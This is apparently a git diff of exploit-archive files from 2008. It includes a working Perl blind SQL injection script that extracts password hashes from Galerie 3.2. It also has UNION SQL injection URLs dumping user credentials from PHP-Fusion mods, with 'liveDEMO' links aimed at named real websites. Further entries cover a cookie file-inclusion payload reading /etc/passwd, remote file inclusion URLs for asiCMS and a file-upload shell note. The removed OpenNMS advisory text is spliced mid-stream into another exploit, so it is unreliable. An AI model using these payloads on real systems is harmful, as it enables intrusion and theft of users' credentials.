m/color=green> (.*?)\<\/font>/mosix); + + + +print "[+] Info:\n"; + 
+print " $kernel\n"; +print " uid$id\n"; + +print " Safe Mode: $safe\n"; + +print "\n"; + + + +} + +__EOF__ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6675.pl b/platforms/php/webapps/6675.pl index 1c1bc7718..d824091ec 100755 --- a/platforms/php/webapps/6675.pl +++ b/platforms/php/webapps/6675.pl 
@@ -1,150 +1,150 @@ -#!/usr/bin/perl -##################################################################################### -# -# Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection -# -# found by: J0hn.X3r -# exploit written by: J0hn.X3r and electron1x -# Date: 05.10.2008 -# Dork: "Galerie 3.2 © 2004 by progressive" -# -# Contact: -# J0hn.X3r -# [+] ICQ: 573813 -# [+] Mail: J0hn.X3r[at]gmail.com -# electron1x -# [+] Mail: electron1x *at* mail *dot* ru -# -# Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor -# Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW, -# Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-) -# -##################################################################################### -# -# First, Galerie 3.2 is an addon for Burning Board Lite. -# -# http://www.site.com/galerie.php?action=show&pic=10 -# -# If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION. -# -# We have to try it with a Blind SQL Injection. -# ( that slow and shitty subquery thingy ;) ) -# -# injection: -# http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/* -# -##################################################################################### - -use strict; -use warnings; -use LWP::UserAgent; - -banner(); - -my $url = shift || usage($0); -my $usr_id = shift; -my $keyspace = "0123456789abcdef"; - -$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ ); -$url = 'http://' . $url unless ( $url =~ /^https?:\/\/.+?\/$/ ); - - -# global vars... -our @url = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' ); -our $ua = LWP::UserAgent->new; -$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows .. - -# regexes.. 
-our $regex = 'Bild\ \d+\ von\ (\d+)'; -my $prefix_regex = '(\w+)_galeriedata'; -my $regex_id = 'pic=(\d+)'; - -my $prefix = ''; -my $pic_id = ''; - -print "[~] Preparing attack...\n"; -my $r = $ua->get($url . "/galerie.php?action=show&pic=%27"); - die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success ); - die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ ); - print "\t[*] Target seems to be vulnerable\n"; - $prefix = $1; - $url[0] =~ s/bb2/$prefix/; - -$r = $ua->get($url . "/galerie.php"); - die "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ ); - $pic_id = $1; - $url[0] =~ s/{id}/$pic_id/; - - print "\t[*] Using table prefix $prefix\n"; - print "\t[*] Using pic-id $pic_id\n"; - - -print "[~] Unleashing Black Magic...\n"; - print STDERR "\t[*] Getting Hash "; - - -for ( 1..32 ) { - $url[0] =~ s/\),\d{1,2},/\),$_,/; - blind( build_array($keyspace), 0, 16); -} -print "\n"; - - - -sub banner -{ - print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n"; - print "[~] Written by J0hn.x3r and electron1x\n\n" -} - -sub usage -{ - my $script = shift; - print "[*] Usage\n" , - "\t$script \n" , - "\tuser id defaults to 1\n" , - "[*] Examples\n" , - "\t$script http://example.com/forum/ 2\n" , - "\t$script localhost/board/\n" , - "\t$script localhost 31337\n"; - exit(0); -} - - - -sub blind -{ - my ( $keyspace, $bottom, $top ) = @_; - my $center = int ($bottom+$top)/2; - print STDERR chr $$keyspace[$center]; - if ( request($$keyspace[$center], '=')) { - return; - } elsif ( $top-$bottom > 0) { - print STDERR "\b"; - return blind($keyspace, $center+1, $top ) - unless ( request($$keyspace[$center], '<') ); - return blind($keyspace, $bottom, $center-1); - } else { - print STDERR "\n[!!] 
Something went wront, dunno what..\n"; - exit(1); - } -} - -sub build_array -{ - my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g; - return \@sorted; -} - - -sub request -{ - my ( $key, $flag ) = @_; - my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]); - $r->content =~ /$regex/; - return ($1 > 0); -} - -__END__ - -# milw0rm.com [2008-10-05] +#!/usr/bin/perl +##################################################################################### +# +# Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection +# +# found by: J0hn.X3r +# exploit written by: J0hn.X3r and electron1x +# Date: 05.10.2008 +# Dork: "Galerie 3.2 © 2004 by progressive" +# +# Contact: +# J0hn.X3r +# [+] ICQ: 573813 +# [+] Mail: J0hn.X3r[at]gmail.com +# electron1x +# [+] Mail: electron1x *at* mail *dot* ru +# +# Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor +# Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW, +# Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-) +# +##################################################################################### +# +# First, Galerie 3.2 is an addon for Burning Board Lite. +# +# http://www.site.com/galerie.php?action=show&pic=10 +# +# If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION. +# +# We have to try it with a Blind SQL Injection. +# ( that slow and shitty subquery thingy ;) ) +# +# injection: +# http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/* +# +##################################################################################### + +use strict; +use warnings; +use LWP::UserAgent; + +banner(); + +my $url = shift || usage($0); +my $usr_id = shift; +my $keyspace = "0123456789abcdef"; + +$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ ); +$url = 'http://' . $url unless ( $url =~ /^https?:\/\/.+?\/$/ ); + + +# global vars... 
+our @url = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' ); +our $ua = LWP::UserAgent->new; +$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows .. + +# regexes.. +our $regex = 'Bild\ \d+\ von\ (\d+)'; +my $prefix_regex = '(\w+)_galeriedata'; +my $regex_id = 'pic=(\d+)'; + +my $prefix = ''; +my $pic_id = ''; + +print "[~] Preparing attack...\n"; +my $r = $ua->get($url . "/galerie.php?action=show&pic=%27"); + die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success ); + die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ ); + print "\t[*] Target seems to be vulnerable\n"; + $prefix = $1; + $url[0] =~ s/bb2/$prefix/; + +$r = $ua->get($url . "/galerie.php"); + die "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ ); + $pic_id = $1; + $url[0] =~ s/{id}/$pic_id/; + + print "\t[*] Using table prefix $prefix\n"; + print "\t[*] Using pic-id $pic_id\n"; + + +print "[~] Unleashing Black Magic...\n"; + print STDERR "\t[*] Getting Hash "; + + +for ( 1..32 ) { + $url[0] =~ s/\),\d{1,2},/\),$_,/; + blind( build_array($keyspace), 0, 16); +} +print "\n"; + + + +sub banner +{ + print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n"; + print "[~] Written by J0hn.x3r and electron1x\n\n" +} + +sub usage +{ + my $script = shift; + print "[*] Usage\n" , + "\t$script \n" , + "\tuser id defaults to 1\n" , + "[*] Examples\n" , + "\t$script http://example.com/forum/ 2\n" , + "\t$script localhost/board/\n" , + "\t$script localhost 31337\n"; + exit(0); +} + + + +sub blind +{ + my ( $keyspace, $bottom, $top ) = @_; + my $center = int ($bottom+$top)/2; + print STDERR chr $$keyspace[$center]; + if ( request($$keyspace[$center], '=')) { + return; + } elsif ( $top-$bottom > 0) { + print STDERR "\b"; + return blind($keyspace, $center+1, $top ) + unless ( request($$keyspace[$center], '<') ); + return 
blind($keyspace, $bottom, $center-1); + } else { + print STDERR "\n[!!] Something went wront, dunno what..\n"; + exit(1); + } +} + +sub build_array +{ + my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g; + return \@sorted; +} + + +sub request +{ + my ( $key, $flag ) = @_; + my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]); + $r->content =~ /$regex/; + return ($1 > 0); +} + +__END__ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6676.txt b/platforms/php/webapps/6676.txt index e727bd297..80ac65667 100755 --- a/platforms/php/webapps/6676.txt +++ b/platforms/php/webapps/6676.txt 
@@ -1,194 +1,194 @@ -OpenNMS Multiple Vulnerabilities --------------------------------- - -BugSec | Security Advisory -Moshe Ben-Abu | Security Expert - - -Advisory URL (PDF): -http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf - - -Vendor ------- -OpenNMS Group – http://www.opennms.com -OpenNMS Project – http://www.opennms.org - -Application Description ------------------------ -“OpenNMS is the world's first enterprise grade network management -platform developed under the open source model. It -consists of a community supported open-source project as well as a -commercial services, training, and support -organization. - From OpenNMS Project website. - - -OpenNMS HTTP Response Splitting Vulnerability ---------------------------------------------- - -Vulnerability Information -------------------------- -Remotely exploitable: Yes -Locally exploitable: No -Affected versions: -OpenNMS 1.5.93-1 -Other versions may also be affected. - -Vulnerability Details ---------------------- -An input validation problem exists within OpenNMS which allows injecting -CR (carriage return - %0D or \r) and LF -(line feed - %0A or \n) characters into the server HTTP response header, -resulting in a HTTP Response Splitting[1] -vulnerability. -This vulnerability is possible because the application fails to validate -user supplied input, returning it -un-sanitized within the server HTTP response header back to the client. -This vulnerability not only gives attackers control of the remaining -headers and body of the server response, but -also allows them to create additional responses entirely under their -control. -Attacker-supplied HTML or JavaScript code could run in the context of -the affected site, potentially allowing an -attacker to steal cookie-based authentication credentials, control how -the site is rendered to the user, and -influence or misrepresent how web content is served, cached, or -interpreted. Other attacks are also possible. 
- - - - - - -Proof-of-Concept ----------------- - -Header injection: -http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec - -Server response: -HTTP/1.1 302 Moved Temporarily -Date: Thu, 25 Sep 2008 11:30:05 GMT -Server: Apache/2.2.3 -Location: http://server/opennms/event/list? -InjectedHeader: BugSec= -Content-Length: 0 -Connection: close -Content-Type: text/plain; charset=UTF-8 - - -HTTP Response Splitting: -http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text -/html%0D%0AContent-Length:%2036%0D%0A%0D%0ABugSec INCLUDE - -exploit: -javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; - -Ingenious work :D - -# milw0rm.com [2008-10-05] +# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability +# url: http://sourceforge.net/projects/phpabook/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# *Requirements: magic_quotes_gpc = Off + +vuln file: include/config.inc.php +vuln code: + +x: >... +61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") { + $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]); + $userName = $userArray[0]; + $userID = $userArray[1]; + $userLang = $userArray[2]; + include("include/lang/$userLang/inc.messages.php"); +67: } +x: <... + +Proof of Concept (function 'explode' PHP): +[0] = JosS; +[1] = JosS; +[2] = ../../../../etc/passwd%00; ---> INCLUDE + +exploit: +javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; + +Ingenious work :D + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6680.txt b/platforms/php/webapps/6680.txt index 186d10d1e..ece2641f6 100755 --- a/platforms/php/webapps/6680.txt +++ b/platforms/php/webapps/6680.txt 
@@ -1,20 +1,20 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Program: FOSS Gallery Public Version -Version: <= 1.0 -File affected: processFiles.php -Download: http://sourceforge.net/projects/fossgallery/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - --- Bug -- -Website doesn't check the images format and you can upload PHP files. - --- Exploit -- -http://localhost/shell.php - -# milw0rm.com [2008-10-05] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Program: FOSS Gallery Public Version +Version: <= 1.0 +File affected: processFiles.php +Download: http://sourceforge.net/projects/fossgallery/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + +-- Bug -- +Website doesn't check the images format and you can upload PHP files. + +-- Exploit -- +http://localhost/shell.php + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6681.txt b/platforms/php/webapps/6681.txt index 8924b69ef..4a58a80ed 100755 --- a/platforms/php/webapps/6681.txt +++ b/platforms/php/webapps/6681.txt 
@@ -1,40 +1,40 @@ -######################################################## -PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability -######################################################## - -++++++++++++++++++++++++++++ -Author : boom3rang -webpage : www.khg-crew.ws -greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-] -++++++++++++++++++++++++++++ - - -[+] Dork: infusions/manuals/manuals.php?manual= - -[+] Example: http://localhost/infusions/manuals/manuals.php?manual=[ exploit ] - -[+] Exploit --------------------------------- -username: -http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 - -password: -http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 - -email: -http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 --------------------------------- - - -[+] liveDEMO: - -http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 -http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 -http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 -============================ -+Proud 2 be Albanian -+Proud 2 be Muslim -+United States of Albania -============================ - -# milw0rm.com [2008-10-05] +######################################################## +PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability +######################################################## + +++++++++++++++++++++++++++++ +Author : boom3rang +webpage : www.khg-crew.ws +greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-] +++++++++++++++++++++++++++++ + + +[+] Dork: infusions/manuals/manuals.php?manual= + 
+[+] Example: http://localhost/infusions/manuals/manuals.php?manual=[ exploit ] + +[+] Exploit +-------------------------------- +username: +http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 + +password: +http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 + +email: +http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 +-------------------------------- + + +[+] liveDEMO: + +http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1 +http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1 +http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1 +============================ ++Proud 2 be Albanian ++Proud 2 be Muslim ++United States of Albania +============================ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6682.txt b/platforms/php/webapps/6682.txt index 78a8ef9b7..0b6cf44b7 100755 --- a/platforms/php/webapps/6682.txt +++ b/platforms/php/webapps/6682.txt 
@@ -1,38 +1,38 @@ -######################################################## -PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) Remote SQL Injection Vulnerability -######################################################## - -++++++++++++++++++++++++++++ -Author : boom3rang -webpage : www.khg-crew.ws -greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-] -++++++++++++++++++++++++++++ - - -[+] Dork: infusions/raidtracker_panel/thisraidprogress.php? - -[+] Example: http://localhost/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=[ exploit ] - -[+] Exploit --------------------------------- - -http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users-- - --------------------------------- - - -[+] liveDEMO: - -http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users-- - -ps. -Raidgroup: [ Here username] -Ingame Raid ID: [ Here password ] - -============================ -+Proud 2 be Albanian -+Proud 2 be Muslim -+United States of Albania -============================ - -# milw0rm.com [2008-10-05] +######################################################## +PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) Remote SQL Injection Vulnerability +######################################################## + +++++++++++++++++++++++++++++ +Author : boom3rang +webpage : www.khg-crew.ws +greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-] +++++++++++++++++++++++++++++ + + +[+] Dork: infusions/raidtracker_panel/thisraidprogress.php? 
+ +[+] Example: http://localhost/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=[ exploit ] + +[+] Exploit +-------------------------------- + +http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users-- + +-------------------------------- + + +[+] liveDEMO: + +http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users-- + +ps. +Raidgroup: [ Here username] +Ingame Raid ID: [ Here password ] + +============================ ++Proud 2 be Albanian ++Proud 2 be Muslim ++United States of Albania +============================ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6683.txt b/platforms/php/webapps/6683.txt index 0384fc533..0ab637a3e 100755 --- a/platforms/php/webapps/6683.txt +++ b/platforms/php/webapps/6683.txt 
@@ -1,40 +1,40 @@ -######################################################## -PHP-Fusion Mod recept (kat_id) Remote SQL Injection Vulnerability -######################################################## - -++++++++++++++++++++++++++++ -Author : boom3rang -webpage : www.khg-crew.ws -greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=] -++++++++++++++++++++++++++++ - - -[+] Dork: infusions/recept/recept.php? - -[+] Example: http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=[ exploit ] - -[+] Exploit --------------------------------- -username: -http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+ - -password: -http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+ - -email: -http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+ --------------------------------- - - -[+] liveDEMO: - -http://usmalayali.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+ - - -============================ -+Proud 2 be Albanian -+Proud 2 be Muslim -+United States of Albania -============================ - -# milw0rm.com [2008-10-05] +######################################################## +PHP-Fusion Mod recept (kat_id) Remote SQL Injection Vulnerability +######################################################## + +++++++++++++++++++++++++++++ +Author : boom3rang +webpage : www.khg-crew.ws +greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=] +++++++++++++++++++++++++++++ + + +[+] Dork: infusions/recept/recept.php? 
+ +[+] Example: http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=[ exploit ] + +[+] Exploit +-------------------------------- +username: +http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+ + +password: +http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+ + +email: +http://localhost/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+ +-------------------------------- + + +[+] liveDEMO: + +http://usmalayali.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+ + + +============================ ++Proud 2 be Albanian ++Proud 2 be Muslim ++United States of Albania +============================ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6684.txt b/platforms/php/webapps/6684.txt index 435cf17a8..74eaf13c5 100755 --- a/platforms/php/webapps/6684.txt +++ b/platforms/php/webapps/6684.txt 
@@ -1,35 +1,35 @@ -######################################################## -PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability -######################################################## - -++++++++++++++++++++++++++++ -Author : boom3rang -webpage : www.khg-crew.ws -greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=] -++++++++++++++++++++++++++++ - - -[+] Dork: infusions/triscoop_race_system/race_details.php? - -[+] Example: http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ] - -[+] Exploit --------------------------------- - -http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- - --------------------------------- - - -[+] liveDEMO: - -http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- - - -============================ -+Proud 2 be Albanian -+Proud 2 be Muslim -+United States of Albania -============================ - -# milw0rm.com [2008-10-05] +######################################################## +PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability +######################################################## + +++++++++++++++++++++++++++++ +Author : boom3rang +webpage : www.khg-crew.ws +greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=] +++++++++++++++++++++++++++++ + + +[+] Dork: infusions/triscoop_race_system/race_details.php? 
+ +[+] Example: http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ] + +[+] Exploit +-------------------------------- + +http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- + +-------------------------------- + + +[+] liveDEMO: + +http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users-- + + +============================ ++Proud 2 be Albanian ++Proud 2 be Muslim ++United States of Albania +============================ + +# milw0rm.com [2008-10-05] diff --git a/platforms/php/webapps/6685.txt b/platforms/php/webapps/6685.txt index a093bd622..c3411bb19 100755 --- a/platforms/php/webapps/6685.txt +++ b/platforms/php/webapps/6685.txt 
@@ -1,74 +1,74 @@ -=========================================================================================== - - - [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability - - Software : asiCMS version alpha 0.208 - Vendor : http://asicms.sourceforge.net/ - Download : http://sourceforge.net/project/showfiles.php?group_id=203457 - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - - -=========================================================================================== - - - [o] Vulnerable file - - classes/Auth/OpenID/Association.php - classes/Auth/OpenID/BigMath.php - classes/Auth/OpenID/DiffieHellman.php - classes/Auth/OpenID/DumbStore.php - classes/Auth/OpenID/Extension.php - classes/Auth/OpenID/FileStore.php - classes/Auth/OpenID/HMAC.php - classes/Auth/OpenID/MemcachedStore.php - classes/Auth/OpenID/Message.php - classes/Auth/OpenID/Nonce.php - classes/Auth/OpenID/SQLStore.php - classes/Auth/OpenID/SReg.php - classes/Auth/OpenID/TrustRoot.php - classes/Auth/OpenID/URINorm.php - classes/Auth/Yadis/XRDS.php - classes/Auth/Yadis/XRI.php - classes/Auth/Yadis/XRIRes.php - - All the file is affected by _ENV[asicms][path] variable - - - - [o] Exploit - - http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]= - 
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]= - http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]= - - -=========================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ www.mainhack.com ] - VOP Crew [ Vaksin13 OoN_BoY Paman ] - H312Y yooogy mousekill }^-^{ k1tk4t - skulmatic olibekas ulga Cungkee str0ke - - -=========================================================================================== - -# milw0rm.com [2008-10-06] +=========================================================================================== + + + [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability + + Software : asiCMS version alpha 0.208 + Vendor : http://asicms.sourceforge.net/ + Download : http://sourceforge.net/project/showfiles.php?group_id=203457 + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + + +=========================================================================================== + + + [o] Vulnerable file + + classes/Auth/OpenID/Association.php + classes/Auth/OpenID/BigMath.php + classes/Auth/OpenID/DiffieHellman.php + classes/Auth/OpenID/DumbStore.php + classes/Auth/OpenID/Extension.php + classes/Auth/OpenID/FileStore.php + classes/Auth/OpenID/HMAC.php + classes/Auth/OpenID/MemcachedStore.php + classes/Auth/OpenID/Message.php + classes/Auth/OpenID/Nonce.php + classes/Auth/OpenID/SQLStore.php + classes/Auth/OpenID/SReg.php + classes/Auth/OpenID/TrustRoot.php + classes/Auth/OpenID/URINorm.php + classes/Auth/Yadis/XRDS.php + classes/Auth/Yadis/XRI.php 
+ classes/Auth/Yadis/XRIRes.php + + All the file is affected by _ENV[asicms][path] variable + + + + [o] Exploit + + http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]= + http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]= + + +=========================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ www.mainhack.com ] + VOP Crew [ Vaksin13 OoN_BoY Paman 